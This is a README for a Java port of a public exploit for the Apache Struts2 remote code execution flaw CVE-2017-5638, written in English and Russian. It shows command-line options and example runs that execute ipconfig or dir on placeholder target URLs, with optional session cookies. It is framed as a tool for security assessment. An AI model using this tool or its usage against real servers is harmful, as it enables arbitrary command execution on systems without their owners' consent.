
This is a sort of Java porting of the Python exploit at: https://www.exploit-db.com/exploits/41570/.
Это своего рода Java-портирование Python-эксплойта: https://www.exploit-db.com/exploits/41570/.
Это программное обеспечение написано без внешних зависимостей.
Этот инструмент предназначен для инженеров по безопасности и специалистов AppSec для оценки защищенности. Пожалуйста, используйте этот инструмент ответственно. Я не несу ответственности за то, как кто-либо использует это приложение. Я НЕ несу ответственности за любой ущерб, причиненный, или любые преступления, совершенные с помощью этого инструмента.
Usage:
java -jar struts2_cve-2017-5638.jar [options]
Description:
Exploiting Apache Struts2 Remote Code Execution (CVE-2017-5638).
Options:
-h, --help
Prints this help and exits.
-u, --url [target_URL]
The target URL where the exploit will be performed.
-cmd, --command [command_to_execute]
The command that will be executed on the remote machine.
--cookies [cookies]
Optional. Cookies passed into the request, i.e. authentication cookies.
-v, --verbose
Optional. Increase verbosity.
java -jar struts2_cve-2017-5638.jar --url "https://vuln1.foo.com/asd" --command ipconfig
java -jar struts2_cve-2017-5638.jar --url "https://vuln2.foo.com/asd" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
java -jar struts2_cve-2017-5638.jar --url "https://vuln3.foo.com/asd" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
Этот проект лицензирован под лицензией MIT — подробности в файле LICENSE.txt.